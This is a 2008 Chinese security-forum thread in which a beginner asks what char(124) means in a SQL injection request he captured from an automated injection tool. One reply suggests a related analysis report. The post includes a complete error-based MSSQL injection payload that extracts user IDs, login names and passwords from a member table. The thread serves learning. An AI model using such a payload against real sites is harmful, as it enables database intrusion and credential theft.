Board logo

标题: [讨论]菜鸟问SQL注入中的小问题! [打印本页]

作者: s37su37    时间: 2008-7-21 00:11     标题: [讨论]菜鸟问SQL注入中的小问题!

[讨论]菜鸟问SQL注入中的小问题!
议题作者:寂寞520
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

        最近想学习SQL注入,于是抓包看看前辈们的注入语句,我用WinSock Expert截取了明小子注入工具的发送代码,只看懂一部分,好头大哦!%2B我知道是+ 号,但是char(124)这种是什么意思啊?我百度没到,哪位大大帮忙给菜鸟解释下好吗?

info.aspx?id=111 And char(124)%2B(Select Top 1 isNull(cast([USERID] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Loging] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PASS] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 2 [USERID],[Loging],[PASS] From [Lily]..[member] Where 1=1 Order by [USERID],[Loging],[PASS]) T Order by [USERID] desc,[Loging] desc,[PASS] desc)>0

帖子1 精华0 积分1 阅读权限40 在线时间0 小时 注册时间2008-3-30 最后登录2008-4-6 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

trace
晶莹剔透§烈日灼然
作者: 石头    时间: 2008-7-21 00:11

NBSI 注入分析跟踪报告(MSSQL篇)

百度一下,这个分析的比较好
帖子111 精华0 积分304 阅读权限40 性别男 在线时间137 小时 注册时间2006-4-3 最后登录2008-7-4 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

赵子岩
惟一

晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2